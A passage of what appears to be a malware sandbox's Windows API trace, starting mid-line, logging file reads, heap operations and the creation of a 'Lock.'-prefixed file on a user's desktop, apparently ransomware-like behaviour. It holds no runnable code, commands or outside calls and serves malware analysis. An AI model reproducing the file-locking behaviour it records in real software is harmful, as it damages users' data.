lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0105.558] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.558] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0105.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0105.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.TtFu8ac2GuQ.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.ttfu8ac2guq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0105.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.635] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0105.635] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x1e8b, lpOverlapped=0x0) returned 1 [0105.636] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0105.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0105.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e8b) returned 0x2ace888 [0105.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cab020 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e8b) returned 0x2ad0720 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0105.639] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e8b) returned 0x2ace888 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0105.639] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0105.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0105.640] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e8b) returned 0x2ace888 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0105.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0105.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0105.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0105.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0105.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e8b) returned 0x2a7a130 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0105.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0105.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0105.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0105.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0105.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0105.697] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.697] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0105.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0105.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.700] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0105.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0105.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0105.701] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 